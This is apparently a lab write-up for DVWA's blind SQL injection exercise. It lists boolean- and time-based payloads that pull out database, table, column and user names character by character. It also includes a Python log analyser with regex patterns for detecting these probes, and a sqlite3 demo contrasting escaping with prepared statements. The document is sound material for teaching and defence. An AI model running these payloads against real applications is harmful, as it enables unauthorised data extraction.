Introduction
SQL blind injection
SQL Injection (Blind) means blind SQL injection.
Ordinary injection: the detailed query result is visible in the response.
Blind injection: the target only answers "yes" or "no"; no detailed content is returned.
Types of blind SQL injection
Boolean-based blind injection
Time-based blind injection
Error-based blind injection
Security level: Low
View the source
Source analysis
The code performs no checking or filtering on the id parameter, so there is an obvious SQL injection vulnerability.
At the same time, the SQL query can only produce two kinds of response:
User ID exists in the database; User ID is MISSING from the database;
Single-quote injection
Boolean-based blind injection
Database name
Length of the database name
1' and length(database())=4 #
Database name, one character at a time
1' and ascii(substr(database(),1,1))=100# //d
1' and ascii(substr(database(),2,1))=118# //v
1' and ascii(substr(database(),3,1))=119# //w
1' and ascii(substr(database(),4,1))=97# //a
Table names
Number of tables
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2#
Length of each table name
1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9#
1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5#
Table names
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103# //g
......
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),9))=107# //k
This finally yields the first table name: guestbook
1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117# //u
…
This finally yields the second table name: users
Columns
Determine the number of columns
1' and (select count(column_name) from information_schema.columns where table_name='users')=8#
Determine the length of the first column name (user_id)
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7#
Column name (user_id)
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117#
Column values
1' and ascii(substr((select user from users limit 0,1),1,1))=97#
Time-based injection
Similar to the boolean-based approach, except that the yes/no answer is read from the response delay: when the guessed condition is true, the server sleeps for the requested number of seconds before responding.
Database name
Length of the database name
1' and if(length(database()) =4,sleep(5) ,1)#
Database name
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)# //d
Table names
Number of tables
1' and if((select count(table_name) from information_schema.tables where table_schema='dvwa')=2,sleep(5),1)#
Table name lengths (guestbook: 9, users: 5)
1' and if(length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9,sleep(5),1)#
1' and if(length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5,sleep(5),1)#
Table names (guestbook, users)
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103,sleep(5),1)# //g
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),9))=107,sleep(5),1)# //k
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117,sleep(5),1)#
Column names (users)
Number of columns
1' and if((select count(column_name) from information_schema.columns where table_name='users')=8,sleep(5),1)#
Column name length (taking user_id as the example)
1' and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7,sleep(5),1)#
Column name (taking the u of user_id as the example)
Enter: 1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117,sleep(5),1)# //u
Column values
1' and if(ascii(substr((select user from users limit 0,1),1,1))=97,sleep(5),1)#
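Both oracles above leave a characteristic trace in the web server's access log: a run of requests from one client whose id parameter differs only in the guessed number, and, for the time-based variant, a response time that matches the sleep() the request asked for. The following Python script is an added example, not part of this write-up or of DVWA, that parses constructed log lines, flags the probe shapes used in the boolean and time-based sections above, confirms a time-based probe when the measured response time is consistent with its sleep() argument, and reports clients that repeat one probe shape with only the guessed value changing. The log format (Combined Log Format with a trailing response-time field in milliseconds), the sample lines, the client addresses and the thresholds are all assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample: Combined Log Format plus a trailing response-time field in
# milliseconds (that extra field is an assumption about the server's log format).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4321 12
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+length%28database%28%29%29%3D4+%23&Submit=Submit HTTP/1.1" 200 4321 13
10.0.0.5 - - [12/Mar/2024:10:00:04 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D97%23&Submit=Submit HTTP/1.1" 200 4298 12
10.0.0.5 - - [12/Mar/2024:10:00:05 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D98%23&Submit=Submit HTTP/1.1" 200 4298 11
10.0.0.5 - - [12/Mar/2024:10:00:06 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D99%23&Submit=Submit HTTP/1.1" 200 4298 12
10.0.0.5 - - [12/Mar/2024:10:00:07 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D100%23&Submit=Submit HTTP/1.1" 200 4321 12
10.0.0.5 - - [12/Mar/2024:10:00:15 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+if%28length%28database%28%29%29%3D4%2Csleep%285%29%2C1%29%23&Submit=Submit HTTP/1.1" 200 4321 5014
10.0.0.9 - - [12/Mar/2024:10:00:16 +0000] "GET /vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4310 11
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt_ms>\d+)$'
)

# Probe shapes taken from the payloads shown in the write-up above.
PROBE_SIGNATURES = {
    "db-length":   re.compile(r"length\s*\(\s*database\s*\(\s*\)\s*\)", re.I),
    "char-oracle": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "schema-enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "time-oracle": re.compile(r"\bif\s*\(.*?sleep\s*\(\s*(\d+)", re.I | re.S),
}


def parse_line(line):
    """Split one access-log line; returns None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt_ms"] = int(rec["rt_ms"])
    # parse_qs percent-decodes once, so %27 becomes ' and %23 becomes #,
    # exactly the text the application saw (a browser never sends a raw #).
    rec["params"] = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec


def probe_labels(params, rt_ms, tolerance=0.9):
    """Labels for every parameter value that matches a blind-SQLi probe shape."""
    labels = set()
    for name, values in params.items():
        for value in values:
            for label, pattern in PROBE_SIGNATURES.items():
                m = pattern.search(value)
                if not m:
                    continue
                labels.add(f"{name}:{label}")
                # A response at least as slow as the requested sleep() means the
                # server really slept, i.e. the injected condition evaluated true.
                if label == "time-oracle" and rt_ms >= int(m.group(1)) * 1000 * tolerance:
                    labels.add(f"{name}:time-oracle-confirmed")
    return labels


def probe_shape(params):
    """Collapse digits so probes that differ only in the guessed value compare equal."""
    return tuple(sorted(
        (name, tuple(re.sub(r"\d+", "N", v) for v in values))
        for name, values in params.items()
    ))


def analyze(log_text, repeat_threshold=3):
    """Return (findings, enumerating_ips): per-line labels and clients that
    repeat one probe shape at least repeat_threshold times."""
    findings = []
    shapes = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        labels = probe_labels(rec["params"], rec["rt_ms"])
        if labels:
            findings.append((rec["ip"], rec["ts"], sorted(labels)))
            shapes[(rec["ip"], probe_shape(rec["params"]))] += 1
    enumerating = sorted({ip for (ip, _shape), n in shapes.items() if n >= repeat_threshold})
    return findings, enumerating


if __name__ == "__main__":
    found, ips = analyze(SAMPLE_LOG)
    for ip, ts, labels in found:
        print(ip, ts, ", ".join(labels))
    print("character-by-character enumeration from:", ips)
```

The repeat counter is what distinguishes a single odd request from an extraction: each character of a name costs the probe at least one request with only the compared number changing, so grouping by the digit-collapsed shape surfaces the enumeration even when every individual request returned 200.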
Security level: Medium
View the source
Source analysis
As can be seen, the Medium-level code uses the mysql_real_escape_string function to escape the special characters \x00, \n, \r, \, ', " and \x1a.
It also replaces the text field with a drop-down form, restricting what the user can enter.
It is easy to see that the user can only choose 1-5 from the drop-down, yet a numeric SQL injection remains: the escaped id is inserted into the query without quotes, so escaping quote characters does not help.
Capture the request with Burp Suite and edit the id parameter there; the rest of the process is the same as above, using numeric payloads.
Security level: High
View the source
Source analysis
The High level adds LIMIT 1 to the SQL query so that only one result is output.
Although LIMIT 1 is added, it can be commented out with #.
At the High level, time-based blind injection is not suitable, because the High-level source shows that it calls sleep(rand(2,4)) regardless of whether the guess is right or wrong, so the delay no longer carries any information.
Security level: Impossible
View the source
Source analysis
The Impossible-level code uses PDO prepared statements, which draw a clear line between code and data and effectively defend against SQL injection.
It also outputs a result only when the query returns exactly one row.
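To make the difference between the Medium and Impossible defences concrete, the following Python/sqlite3 program is an added example, not DVWA's PHP code, that mimics both: an escaper with the same character set as mysql_real_escape_string whose output is interpolated unquoted, as at the Medium level, and a parameterised lookup that returns a row only when exactly one row comes back, as at the Impossible level. The users table and its rows are constructed, the integer validation in the Impossible-style lookup is this example's own assumption about how the numeric check is done, and sqlite3 stands in for MySQL, so the error raised on an escaped quote is sqlite's.

```python
import sqlite3

# mysql_real_escape_string escapes exactly these characters; it leaves spaces,
# digits, '=', parentheses and keywords such as AND untouched.
_ESCAPES = {
    "\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
    "'": "\\'", '"': '\\"', "\x1a": "\\Z",
}


def escape_like_mysql(value: str) -> str:
    """Python stand-in for mysql_real_escape_string (same character set)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with the DVWA column names."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "admin", "admin", "admin"), (2, "Gordon", "Brown", "gordonb")],
    )
    return conn


def medium_query(user_id: str) -> str:
    """Medium level: the value is escaped, then interpolated WITHOUT quotes,
    so anything that is not a quote character reaches the SQL text intact."""
    return (
        "SELECT first_name, last_name FROM users WHERE user_id = "
        + escape_like_mysql(user_id)
    )


def run_medium(conn, user_id):
    """Execute the Medium-style query; None means the database rejected it."""
    try:
        return conn.execute(medium_query(user_id)).fetchall()
    except sqlite3.Error:
        return None


def impossible_lookup(conn, user_id):
    """Impossible level: a validated integer is bound to a placeholder and a
    result is returned only when exactly one row matches.  The int() check is
    this example's assumption about the numeric validation."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return None
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1", (uid,)
    ).fetchall()
    return rows[0] if len(rows) == 1 else None


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1' and 1=1 #", "1 and 1=1", "1 and 1=2"):
        print(f"{probe!r:20} medium={run_medium(db, probe)!r:22} "
              f"impossible={impossible_lookup(db, probe)!r}")
```

Running it shows the two behaviours side by side: the quoted payload is broken by the escaping and the database rejects it, but an unquoted condition passes through the escaper unchanged and still acts as a yes/no oracle at the Medium level (one row for a true condition, none for a false one), while the Impossible-style lookup rejects both and only ever answers a plain integer id.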